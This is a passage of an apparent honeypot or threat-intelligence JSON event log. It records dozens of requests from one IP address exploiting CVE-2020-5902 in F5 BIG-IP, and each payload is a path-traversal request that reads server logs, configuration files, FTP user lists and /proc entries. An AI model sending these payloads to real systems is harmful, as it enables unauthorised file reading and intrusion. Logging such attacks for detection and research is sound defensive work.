2468. "source_ip_address": "85.248.227.163",
2469. "country": "SK",
2470. "user_agent": "python-requests/2.23.0",
2471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/httpd/logs/access_log HTTP/1.1",
2472. "post_data": "",
2473. "target_port": 443,
2474. "protocol": "tcp",
2475. "tags": [
2476. {
2477. "cve": "CVE-2020-5902",
2478. "category": "Platform",
2479. "description": "F5 BIG-IP Configuration Utility RCE"
2480. }
2481. ],
2482. "event_count": 1,
2483. "first_seen": "2020-07-09T08:04:48Z",
2484. "last_seen": "2020-07-09T08:04:48Z"
2485. },
2486. {
2487. "event_id": "e1ba21693ece5181bdec16d066fdfa40cb0b985659aaf73559e8b60da270379b",
2488. "source_ip_address": "85.248.227.163",
2489. "country": "SK",
2490. "user_agent": "python-requests/2.23.0",
2491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/stats_log HTTP/1.1",
2492. "post_data": "",
2493. "target_port": 443,
2494. "protocol": "tcp",
2495. "tags": [
2496. {
2497. "cve": "CVE-2020-5902",
2498. "category": "Platform",
2499. "description": "F5 BIG-IP Configuration Utility RCE"
2500. }
2501. ],
2502. "event_count": 1,
2503. "first_seen": "2020-07-09T08:04:46Z",
2504. "last_seen": "2020-07-09T08:04:46Z"
2505. },
2506. {
2507. "event_id": "dbc28042a11cf8a4c369ce40213fd67286ae211b8566d23f184d187e439246ac",
2508. "source_ip_address": "85.248.227.163",
2509. "country": "SK",
2510. "user_agent": "python-requests/2.23.0",
2511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/login_log HTTP/1.1",
2512. "post_data": "",
2513. "target_port": 443,
2514. "protocol": "tcp",
2515. "tags": [
2516. {
2517. "cve": "CVE-2020-5902",
2518. "category": "Platform",
2519. "description": "F5 BIG-IP Configuration Utility RCE"
2520. }
2521. ],
2522. "event_count": 1,
2523. "first_seen": "2020-07-09T08:04:45Z",
2524. "last_seen": "2020-07-09T08:04:45Z"
2525. },
2526. {
2527. "event_id": "63605cdf42142f7a210be569cf08ec0725c68857e1b1092d6e210d5c6bd17091",
2528. "source_ip_address": "85.248.227.163",
2529. "country": "SK",
2530. "user_agent": "python-requests/2.23.0",
2531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/license_log HTTP/1.1",
2532. "post_data": "",
2533. "target_port": 443,
2534. "protocol": "tcp",
2535. "tags": [
2536. {
2537. "cve": "CVE-2020-5902",
2538. "category": "Platform",
2539. "description": "F5 BIG-IP Configuration Utility RCE"
2540. }
2541. ],
2542. "event_count": 1,
2543. "first_seen": "2020-07-09T08:04:43Z",
2544. "last_seen": "2020-07-09T08:04:43Z"
2545. },
2546. {
2547. "event_id": "5e5490890476075f9fa1697a944be982d62164c173447e4fb4b905b3f5990dea",
2548. "source_ip_address": "85.248.227.163",
2549. "country": "SK",
2550. "user_agent": "python-requests/2.23.0",
2551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/error_log HTTP/1.1",
2552. "post_data": "",
2553. "target_port": 443,
2554. "protocol": "tcp",
2555. "tags": [
2556. {
2557. "cve": "CVE-2020-5902",
2558. "category": "Platform",
2559. "description": "F5 BIG-IP Configuration Utility RCE"
2560. }
2561. ],
2562. "event_count": 1,
2563. "first_seen": "2020-07-09T08:04:42Z",
2564. "last_seen": "2020-07-09T08:04:42Z"
2565. },
2566. {
2567. "event_id": "c8e37026473e4d4fe375b23b5d4688aebd77dac86910a9cdee11397535d4066d",
2568. "source_ip_address": "85.248.227.163",
2569. "country": "SK",
2570. "user_agent": "python-requests/2.23.0",
2571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/access_log HTTP/1.1",
2572. "post_data": "",
2573. "target_port": 443,
2574. "protocol": "tcp",
2575. "tags": [
2576. {
2577. "cve": "CVE-2020-5902",
2578. "category": "Platform",
2579. "description": "F5 BIG-IP Configuration Utility RCE"
2580. }
2581. ],
2582. "event_count": 1,
2583. "first_seen": "2020-07-09T08:04:40Z",
2584. "last_seen": "2020-07-09T08:04:40Z"
2585. },
2586. {
2587. "event_id": "63db1dd04859713051112ec7ce9b45dc40d5056352e685bb7cc076502ef1f329",
2588. "source_ip_address": "85.248.227.163",
2589. "country": "SK",
2590. "user_agent": "python-requests/2.23.0",
2591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs HTTP/1.1",
2592. "post_data": "",
2593. "target_port": 443,
2594. "protocol": "tcp",
2595. "tags": [
2596. {
2597. "cve": "CVE-2020-5902",
2598. "category": "Platform",
2599. "description": "F5 BIG-IP Configuration Utility RCE"
2600. }
2601. ],
2602. "event_count": 1,
2603. "first_seen": "2020-07-09T08:04:39Z",
2604. "last_seen": "2020-07-09T08:04:39Z"
2605. },
2606. {
2607. "event_id": "1c18beeb7f74751ef70cb0ec37170aafabe7cded04d328c96e8c11cc125185b3",
2608. "source_ip_address": "85.248.227.163",
2609. "country": "SK",
2610. "user_agent": "python-requests/2.23.0",
2611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/error.log HTTP/1.1",
2612. "post_data": "",
2613. "target_port": 443,
2614. "protocol": "tcp",
2615. "tags": [
2616. {
2617. "cve": "CVE-2020-5902",
2618. "category": "Platform",
2619. "description": "F5 BIG-IP Configuration Utility RCE"
2620. }
2621. ],
2622. "event_count": 1,
2623. "first_seen": "2020-07-09T08:04:37Z",
2624. "last_seen": "2020-07-09T08:04:37Z"
2625. },
2626. {
2627. "event_id": "d54039926893f8258aed7f64a64593e66dc22c151b79dd416ea5aacb1c4d19fd",
2628. "source_ip_address": "85.248.227.163",
2629. "country": "SK",
2630. "user_agent": "python-requests/2.23.0",
2631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/error_log HTTP/1.1",
2632. "post_data": "",
2633. "target_port": 443,
2634. "protocol": "tcp",
2635. "tags": [
2636. {
2637. "cve": "CVE-2020-5902",
2638. "category": "Platform",
2639. "description": "F5 BIG-IP Configuration Utility RCE"
2640. }
2641. ],
2642. "event_count": 1,
2643. "first_seen": "2020-07-09T08:04:36Z",
2644. "last_seen": "2020-07-09T08:04:36Z"
2645. },
2646. {
2647. "event_id": "28d119974f7370995dd5f71e288681f935f41bdfb654e894661c08a849462080",
2648. "source_ip_address": "85.248.227.163",
2649. "country": "SK",
2650. "user_agent": "python-requests/2.23.0",
2651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/audit_log HTTP/1.1",
2652. "post_data": "",
2653. "target_port": 443,
2654. "protocol": "tcp",
2655. "tags": [
2656. {
2657. "cve": "CVE-2020-5902",
2658. "category": "Platform",
2659. "description": "F5 BIG-IP Configuration Utility RCE"
2660. }
2661. ],
2662. "event_count": 1,
2663. "first_seen": "2020-07-09T08:04:34Z",
2664. "last_seen": "2020-07-09T08:04:34Z"
2665. },
2666. {
2667. "event_id": "2d352b6750d253bf3e7aa6eb836cb78a76de586461c89b0eeac852dff4c32531",
2668. "source_ip_address": "85.248.227.163",
2669. "country": "SK",
2670. "user_agent": "python-requests/2.23.0",
2671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs/access.log HTTP/1.1",
2672. "post_data": "",
2673. "target_port": 443,
2674. "protocol": "tcp",
2675. "tags": [
2676. {
2677. "cve": "CVE-2020-5902",
2678. "category": "Platform",
2679. "description": "F5 BIG-IP Configuration Utility RCE"
2680. }
2681. ],
2682. "event_count": 1,
2683. "first_seen": "2020-07-09T08:04:33Z",
2684. "last_seen": "2020-07-09T08:04:33Z"
2685. },
2686. {
2687. "event_id": "c247d73095515cba9bb0567306e31323acee591ba12d5c1be2926ac39f6cb5b9",
2688. "source_ip_address": "85.248.227.163",
2689. "country": "SK",
2690. "user_agent": "python-requests/2.23.0",
2691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs/access_log HTTP/1.1",
2692. "post_data": "",
2693. "target_port": 443,
2694. "protocol": "tcp",
2695. "tags": [
2696. {
2697. "cve": "CVE-2020-5902",
2698. "category": "Platform",
2699. "description": "F5 BIG-IP Configuration Utility RCE"
2700. }
2701. ],
2702. "event_count": 1,
2703. "first_seen": "2020-07-09T08:04:31Z",
2704. "last_seen": "2020-07-09T08:04:31Z"
2705. },
2706. {
2707. "event_id": "26980e4a69a3601a7b64c5ecf0f85f43a39f797af658ea79f7d3888c155482cd",
2708. "source_ip_address": "85.248.227.163",
2709. "country": "SK",
2710. "user_agent": "python-requests/2.23.0",
2711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs HTTP/1.1",
2712. "post_data": "",
2713. "target_port": 443,
2714. "protocol": "tcp",
2715. "tags": [
2716. {
2717. "cve": "CVE-2020-5902",
2718. "category": "Platform",
2719. "description": "F5 BIG-IP Configuration Utility RCE"
2720. }
2721. ],
2722. "event_count": 1,
2723. "first_seen": "2020-07-09T08:04:30Z",
2724. "last_seen": "2020-07-09T08:04:30Z"
2725. },
2726. {
2727. "event_id": "bb2ce050aa576aadbd0c72727f7962bb1a06e1d24317b944cf2cc9081a3b4fb9",
2728. "source_ip_address": "85.248.227.163",
2729. "country": "SK",
2730. "user_agent": "python-requests/2.23.0",
2731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/log HTTP/1.1",
2732. "post_data": "",
2733. "target_port": 443,
2734. "protocol": "tcp",
2735. "tags": [
2736. {
2737. "cve": "CVE-2020-5902",
2738. "category": "Platform",
2739. "description": "F5 BIG-IP Configuration Utility RCE"
2740. }
2741. ],
2742. "event_count": 1,
2743. "first_seen": "2020-07-09T08:04:28Z",
2744. "last_seen": "2020-07-09T08:04:28Z"
2745. },
2746. {
2747. "event_id": "5b4de1f712adf24ac7fda12ab97d9f444fe3e2cbdaafb704ed288eef04844ec2",
2748. "source_ip_address": "85.248.227.163",
2749. "country": "SK",
2750. "user_agent": "python-requests/2.23.0",
2751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/conf/php.ini HTTP/1.1",
2752. "post_data": "",
2753. "target_port": 443,
2754. "protocol": "tcp",
2755. "tags": [
2756. {
2757. "cve": "CVE-2020-5902",
2758. "category": "Platform",
2759. "description": "F5 BIG-IP Configuration Utility RCE"
2760. }
2761. ],
2762. "event_count": 1,
2763. "first_seen": "2020-07-09T08:04:27Z",
2764. "last_seen": "2020-07-09T08:04:27Z"
2765. },
2766. {
2767. "event_id": "1154648750c954b94f6bd47777d2db01d670357b9284bbc368b441bcaec75066",
2768. "source_ip_address": "85.248.227.163",
2769. "country": "SK",
2770. "user_agent": "python-requests/2.23.0",
2771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/conf/modsec.conf HTTP/1.1",
2772. "post_data": "",
2773. "target_port": 443,
2774. "protocol": "tcp",
2775. "tags": [
2776. {
2777. "cve": "CVE-2020-5902",
2778. "category": "Platform",
2779. "description": "F5 BIG-IP Configuration Utility RCE"
2780. }
2781. ],
2782. "event_count": 1,
2783. "first_seen": "2020-07-09T08:04:26Z",
2784. "last_seen": "2020-07-09T08:04:26Z"
2785. },
2786. {
2787. "event_id": "32689d5cadbedac98e4cc110b27130b74dd39b48913d8e2abaf9b71f34196a80",
2788. "source_ip_address": "85.248.227.163",
2789. "country": "SK",
2790. "user_agent": "python-requests/2.23.0",
2791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/lib/php/php.ini HTTP/1.1",
2792. "post_data": "",
2793. "target_port": 443,
2794. "protocol": "tcp",
2795. "tags": [
2796. {
2797. "cve": "CVE-2020-5902",
2798. "category": "Platform",
2799. "description": "F5 BIG-IP Configuration Utility RCE"
2800. }
2801. ],
2802. "event_count": 1,
2803. "first_seen": "2020-07-09T08:04:24Z",
2804. "last_seen": "2020-07-09T08:04:24Z"
2805. },
2806. {
2807. "event_id": "cd33273aaf4583f298af325f979e87a7378f690710801e517af65805149100a7",
2808. "source_ip_address": "85.248.227.163",
2809. "country": "SK",
2810. "user_agent": "python-requests/2.23.0",
2811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/lib/php.ini HTTP/1.1",
2812. "post_data": "",
2813. "target_port": 443,
2814. "protocol": "tcp",
2815. "tags": [
2816. {
2817. "cve": "CVE-2020-5902",
2818. "category": "Platform",
2819. "description": "F5 BIG-IP Configuration Utility RCE"
2820. }
2821. ],
2822. "event_count": 1,
2823. "first_seen": "2020-07-09T08:04:23Z",
2824. "last_seen": "2020-07-09T08:04:23Z"
2825. },
2826. {
2827. "event_id": "cd4a3a986fdf91892b57d280ce52117b5430d4060ac4b402022106c8ba793d89",
2828. "source_ip_address": "85.248.227.163",
2829. "country": "SK",
2830. "user_agent": "python-requests/2.23.0",
2831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/etc/pure-ftpd.conf HTTP/1.1",
2832. "post_data": "",
2833. "target_port": 443,
2834. "protocol": "tcp",
2835. "tags": [
2836. {
2837. "cve": "CVE-2020-5902",
2838. "category": "Platform",
2839. "description": "F5 BIG-IP Configuration Utility RCE"
2840. }
2841. ],
2842. "event_count": 1,
2843. "first_seen": "2020-07-09T08:04:21Z",
2844. "last_seen": "2020-07-09T08:04:21Z"
2845. },
2846. {
2847. "event_id": "38765218b56f41484959d432cee8398b6959d51dd39ca6d9216dabacac569b8e",
2848. "source_ip_address": "85.248.227.163",
2849. "country": "SK",
2850. "user_agent": "python-requests/2.23.0",
2851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/root/anaconda-ks.cfg HTTP/1.1",
2852. "post_data": "",
2853. "target_port": 443,
2854. "protocol": "tcp",
2855. "tags": [
2856. {
2857. "cve": "CVE-2020-5902",
2858. "category": "Platform",
2859. "description": "F5 BIG-IP Configuration Utility RCE"
2860. }
2861. ],
2862. "event_count": 1,
2863. "first_seen": "2020-07-09T08:04:20Z",
2864. "last_seen": "2020-07-09T08:04:20Z"
2865. },
2866. {
2867. "event_id": "b350d57186b0efa10cf5a1cfdfe44eb8e8111821eb1735102cb137c37d27ddbd",
2868. "source_ip_address": "85.248.227.163",
2869. "country": "SK",
2870. "user_agent": "python-requests/2.23.0",
2871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/net/arp HTTP/1.1",
2872. "post_data": "",
2873. "target_port": 443,
2874. "protocol": "tcp",
2875. "tags": [
2876. {
2877. "cve": "CVE-2020-5902",
2878. "category": "Platform",
2879. "description": "F5 BIG-IP Configuration Utility RCE"
2880. }
2881. ],
2882. "event_count": 1,
2883. "first_seen": "2020-07-09T08:04:18Z",
2884. "last_seen": "2020-07-09T08:04:18Z"
2885. },
2886. {
2887. "event_id": "6e820a4add65082917c2267e56b22278266df331418e499b08b6a72b96aa6aac",
2888. "source_ip_address": "85.248.227.163",
2889. "country": "SK",
2890. "user_agent": "python-requests/2.23.0",
2891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/version HTTP/1.1",
2892. "post_data": "",
2893. "target_port": 443,
2894. "protocol": "tcp",
2895. "tags": [
2896. {
2897. "cve": "CVE-2020-5902",
2898. "category": "Platform",
2899. "description": "F5 BIG-IP Configuration Utility RCE"
2900. }
2901. ],
2902. "event_count": 1,
2903. "first_seen": "2020-07-09T08:04:17Z",
2904. "last_seen": "2020-07-09T08:04:17Z"
2905. },
2906. {
2907. "event_id": "0e7a44d259ec9a3a0a77b2dd79868ca8045ef08e7ba1baa7a5d3c8681f9933d9",
2908. "source_ip_address": "85.248.227.163",
2909. "country": "SK",
2910. "user_agent": "python-requests/2.23.0",
2911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/swaps HTTP/1.1",
2912. "post_data": "",
2913. "target_port": 443,
2914. "protocol": "tcp",
2915. "tags": [
2916. {
2917. "cve": "CVE-2020-5902",
2918. "category": "Platform",
2919. "description": "F5 BIG-IP Configuration Utility RCE"
2920. }
2921. ],
2922. "event_count": 1,
2923. "first_seen": "2020-07-09T08:04:15Z",
2924. "last_seen": "2020-07-09T08:04:15Z"
2925. },
2926. {
2927. "event_id": "1fba0015f453d50e49165919c15653a602b1e2f8951691a8c747243b626f3d4a",
2928. "source_ip_address": "85.248.227.163",
2929. "country": "SK",
2930. "user_agent": "python-requests/2.23.0",
2931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/stat HTTP/1.1",
2932. "post_data": "",
2933. "target_port": 443,
2934. "protocol": "tcp",
2935. "tags": [
2936. {
2937. "cve": "CVE-2020-5902",
2938. "category": "Platform",
2939. "description": "F5 BIG-IP Configuration Utility RCE"
2940. }
2941. ],
2942. "event_count": 1,
2943. "first_seen": "2020-07-09T08:04:14Z",
2944. "last_seen": "2020-07-09T08:04:14Z"
2945. },
2946. {
2947. "event_id": "89c364dd25cfc2ef6e2f0a1d1f67f2d1a8d49e4aab5223b6b07e34b5ce51ed46",
2948. "source_ip_address": "85.248.227.163",
2949. "country": "SK",
2950. "user_agent": "python-requests/2.23.0",
2951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/mounts HTTP/1.1",
2952. "post_data": "",
2953. "target_port": 443,
2954. "protocol": "tcp",
2955. "tags": [
2956. {
2957. "cve": "CVE-2020-5902",
2958. "category": "Platform",
2959. "description": "F5 BIG-IP Configuration Utility RCE"
2960. }
2961. ],
2962. "event_count": 1,
2963. "first_seen": "2020-07-09T08:04:12Z",
2964. "last_seen": "2020-07-09T08:04:12Z"
2965. },
2966. {
2967. "event_id": "b0d2e0fafb0638f429e948cb65b1f77e7b4055bcd78b7f966b03fd1c864c256d",
2968. "source_ip_address": "85.248.227.163",
2969. "country": "SK",
2970. "user_agent": "python-requests/2.23.0",
2971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/modules HTTP/1.1",
2972. "post_data": "",
2973. "target_port": 443,
2974. "protocol": "tcp",
2975. "tags": [
2976. {
2977. "cve": "CVE-2020-5902",
2978. "category": "Platform",
2979. "description": "F5 BIG-IP Configuration Utility RCE"
2980. }
2981. ],
2982. "event_count": 1,
2983. "first_seen": "2020-07-09T08:04:11Z",
2984. "last_seen": "2020-07-09T08:04:11Z"
2985. },
2986. {
2987. "event_id": "9619d559258e2dddc9bfc5e31406dd0a034a7418fa163ca5ac9d52e070125560",
2988. "source_ip_address": "85.248.227.163",
2989. "country": "SK",
2990. "user_agent": "python-requests/2.23.0",
2991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/meminfo HTTP/1.1",
2992. "post_data": "",
2993. "target_port": 443,
2994. "protocol": "tcp",
2995. "tags": [
2996. {
2997. "cve": "CVE-2020-5902",
2998. "category": "Platform",
2999. "description": "F5 BIG-IP Configuration Utility RCE"
3000. }
3001. ],
3002. "event_count": 1,
3003. "first_seen": "2020-07-09T08:04:09Z",
3004. "last_seen": "2020-07-09T08:04:09Z"
3005. },
3006. {
3007. "event_id": "433c8381b3a62e7f01b471680859183999f57bca899a7f1403cfcc12c4a03b44",
3008. "source_ip_address": "85.248.227.163",
3009. "country": "SK",
3010. "user_agent": "python-requests/2.23.0",
3011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/ioports HTTP/1.1",
3012. "post_data": "",
3013. "target_port": 443,
3014. "protocol": "tcp",
3015. "tags": [
3016. {
3017. "cve": "CVE-2020-5902",
3018. "category": "Platform",
3019. "description": "F5 BIG-IP Configuration Utility RCE"
3020. }
3021. ],
3022. "event_count": 1,
3023. "first_seen": "2020-07-09T08:04:08Z",
3024. "last_seen": "2020-07-09T08:04:08Z"
3025. },
3026. {
3027. "event_id": "bad5aaa666a7966fa6acd8aa2d9e943532893a48633cf06cafe01e820a020ef6",
3028. "source_ip_address": "85.248.227.163",
3029. "country": "SK",
3030. "user_agent": "python-requests/2.23.0",
3031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/interrupts HTTP/1.1",
3032. "post_data": "",
3033. "target_port": 443,
3034. "protocol": "tcp",
3035. "tags": [
3036. {
3037. "cve": "CVE-2020-5902",
3038. "category": "Platform",
3039. "description": "F5 BIG-IP Configuration Utility RCE"
3040. }
3041. ],
3042. "event_count": 1,
3043. "first_seen": "2020-07-09T08:04:07Z",
3044. "last_seen": "2020-07-09T08:04:07Z"
3045. },
3046. {
3047. "event_id": "4563b96d96ac8e0624ccf009b7772878274f05fef69c66518891c67bb4ee93b2",
3048. "source_ip_address": "85.248.227.163",
3049. "country": "SK",
3050. "user_agent": "python-requests/2.23.0",
3051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/filesystems HTTP/1.1",
3052. "post_data": "",
3053. "target_port": 443,
3054. "protocol": "tcp",
3055. "tags": [
3056. {
3057. "cve": "CVE-2020-5902",
3058. "category": "Platform",
3059. "description": "F5 BIG-IP Configuration Utility RCE"
3060. }
3061. ],
3062. "event_count": 1,
3063. "first_seen": "2020-07-09T08:04:05Z",
3064. "last_seen": "2020-07-09T08:04:05Z"
3065. },
3066. {
3067. "event_id": "8f2c7ca19afa2510c4b12187ae53a28b20561035554efae907e66f3928c9ec09",
3068. "source_ip_address": "85.248.227.163",
3069. "country": "SK",
3070. "user_agent": "python-requests/2.23.0",
3071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/cpuinfo HTTP/1.1",
3072. "post_data": "",
3073. "target_port": 443,
3074. "protocol": "tcp",
3075. "tags": [
3076. {
3077. "cve": "CVE-2020-5902",
3078. "category": "Platform",
3079. "description": "F5 BIG-IP Configuration Utility RCE"
3080. }
3081. ],
3082. "event_count": 1,
3083. "first_seen": "2020-07-09T08:04:04Z",
3084. "last_seen": "2020-07-09T08:04:04Z"
3085. },
3086. {
3087. "event_id": "94380604bd9bf33bbd4d2533ffe8800928095f0d109c96624c667773ee20a6d7",
3088. "source_ip_address": "85.248.227.163",
3089. "country": "SK",
3090. "user_agent": "python-requests/2.23.0",
3091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/opt/xampp/etc/php.ini HTTP/1.1",
3092. "post_data": "",
3093. "target_port": 443,
3094. "protocol": "tcp",
3095. "tags": [
3096. {
3097. "cve": "CVE-2020-5902",
3098. "category": "Platform",
3099. "description": "F5 BIG-IP Configuration Utility RCE"
3100. }
3101. ],
3102. "event_count": 1,
3103. "first_seen": "2020-07-09T08:04:02Z",
3104. "last_seen": "2020-07-09T08:04:02Z"
3105. },
3106. {
3107. "event_id": "c6cee199964fc00069e8f7c0a8e46543da23b9b8bc17434726b31e255f139323",
3108. "source_ip_address": "85.248.227.163",
3109. "country": "SK",
3110. "user_agent": "python-requests/2.23.0",
3111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/opt/lampp/etc/httpd.conf HTTP/1.1",
3112. "post_data": "",
3113. "target_port": 443,
3114. "protocol": "tcp",
3115. "tags": [
3116. {
3117. "cve": "CVE-2020-5902",
3118. "category": "Platform",
3119. "description": "F5 BIG-IP Configuration Utility RCE"
3120. }
3121. ],
3122. "event_count": 1,
3123. "first_seen": "2020-07-09T08:04:01Z",
3124. "last_seen": "2020-07-09T08:04:01Z"
3125. },
3126. {
3127. "event_id": "b2966e60884cb4f02bb8e62ef23c00581fd4097badadbc897662fdc9fbb870e7",
3128. "source_ip_address": "85.248.227.163",
3129. "country": "SK",
3130. "user_agent": "python-requests/2.23.0",
3131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/security_log HTTP/1.1",
3132. "post_data": "",
3133. "target_port": 443,
3134. "protocol": "tcp",
3135. "tags": [
3136. {
3137. "cve": "CVE-2020-5902",
3138. "category": "Platform",
3139. "description": "F5 BIG-IP Configuration Utility RCE"
3140. }
3141. ],
3142. "event_count": 1,
3143. "first_seen": "2020-07-09T08:04:00Z",
3144. "last_seen": "2020-07-09T08:04:00Z"
3145. },
3146. {
3147. "event_id": "9a5111b4533c4d14658fcb2ef97acabcd9eec8c99f5e2d76dfcc4fb3c75fa3cb",
3148. "source_ip_address": "85.248.227.163",
3149. "country": "SK",
3150. "user_agent": "python-requests/2.23.0",
3151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/security_debug_log HTTP/1.1",
3152. "post_data": "",
3153. "target_port": 443,
3154. "protocol": "tcp",
3155. "tags": [
3156. {
3157. "cve": "CVE-2020-5902",
3158. "category": "Platform",
3159. "description": "F5 BIG-IP Configuration Utility RCE"
3160. }
3161. ],
3162. "event_count": 1,
3163. "first_seen": "2020-07-09T08:03:58Z",
3164. "last_seen": "2020-07-09T08:03:58Z"
3165. },
3166. {
3167. "event_id": "685633a0fd3136dfdb135a93d9d3343afcbea5a6a4daa66f15776ac3664ad8dd",
3168. "source_ip_address": "85.248.227.163",
3169. "country": "SK",
3170. "user_agent": "python-requests/2.23.0",
3171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/logs/pure-ftpd.log HTTP/1.1",
3172. "post_data": "",
3173. "target_port": 443,
3174. "protocol": "tcp",
3175. "tags": [
3176. {
3177. "cve": "CVE-2020-5902",
3178. "category": "Platform",
3179. "description": "F5 BIG-IP Configuration Utility RCE"
3180. }
3181. ],
3182. "event_count": 1,
3183. "first_seen": "2020-07-09T08:03:57Z",
3184. "last_seen": "2020-07-09T08:03:57Z"
3185. },
3186. {
3187. "event_id": "6d071787e76bdccd9c5567d390c00a0de25b56399e00aa33bc9ba54b87efce35",
3188. "source_ip_address": "85.248.227.163",
3189. "country": "SK",
3190. "user_agent": "python-requests/2.23.0",
3191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftpusers HTTP/1.1",
3192. "post_data": "",
3193. "target_port": 443,
3194. "protocol": "tcp",
3195. "tags": [
3196. {
3197. "cve": "CVE-2020-5902",
3198. "category": "Platform",
3199. "description": "F5 BIG-IP Configuration Utility RCE"
3200. }
3201. ],
3202. "event_count": 1,
3203. "first_seen": "2020-07-09T08:03:55Z",
3204. "last_seen": "2020-07-09T08:03:55Z"
3205. },
3206. {
3207. "event_id": "c09592e30583ee20239c0a64dfe9df61bbc4c25a2b4d4ee3e8c8e3bd193cd672",
3208. "source_ip_address": "85.248.227.163",
3209. "country": "SK",
3210. "user_agent": "python-requests/2.23.0",
3211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftphosts HTTP/1.1",
3212. "post_data": "",
3213. "target_port": 443,
3214. "protocol": "tcp",
3215. "tags": [
3216. {
3217. "cve": "CVE-2020-5902",
3218. "category": "Platform",
3219. "description": "F5 BIG-IP Configuration Utility RCE"
3220. }
3221. ],
3222. "event_count": 1,
3223. "first_seen": "2020-07-09T08:03:54Z",
3224. "last_seen": "2020-07-09T08:03:54Z"
3225. },
3226. {
3227. "event_id": "086663086d6d2ecb27d41d95e46c8eff5e395a421a53adef4d6f82c9b1866fa0",
3228. "source_ip_address": "85.248.227.163",
3229. "country": "SK",
3230. "user_agent": "python-requests/2.23.0",
3231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/wu-ftpd/ftpaccess HTTP/1.1",
3232. "post_data": "",
3233. "target_port": 443,
3234. "protocol": "tcp",
3235. "tags": [
3236. {
3237. "cve": "CVE-2020-5902",
3238. "category": "Platform",
3239. "description": "F5 BIG-IP Configuration Utility RCE"
3240. }
3241. ],
3242. "event_count": 1,
3243. "first_seen": "2020-07-09T08:03:52Z",
3244. "last_seen": "2020-07-09T08:03:52Z"
3245. },
3246. {
3247. "event_id": "53dcb774c5d882723e22fda17447581ecb31a8f2c698c1bd0b7e976f2f406747",
3248. "source_ip_address": "85.248.227.163",
3249. "country": "SK",
3250. "user_agent": "python-requests/2.23.0",
3251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd/vsftpd.conf HTTP/1.1",
3252. "post_data": "",
3253. "target_port": 443,
3254. "protocol": "tcp",
3255. "tags": [
3256. {
3257. "cve": "CVE-2020-5902",
3258. "category": "Platform",
3259. "description": "F5 BIG-IP Configuration Utility RCE"
3260. }
3261. ],
3262. "event_count": 1,
3263. "first_seen": "2020-07-09T08:03:51Z",
3264. "last_seen": "2020-07-09T08:03:51Z"
3265. },
3266. {
3267. "event_id": "67eb316142720b6b76515f07b527a15e4797bd874368026661a519b67628fe9d",
3268. "source_ip_address": "85.248.227.163",
3269. "country": "SK",
3270. "user_agent": "python-requests/2.23.0",
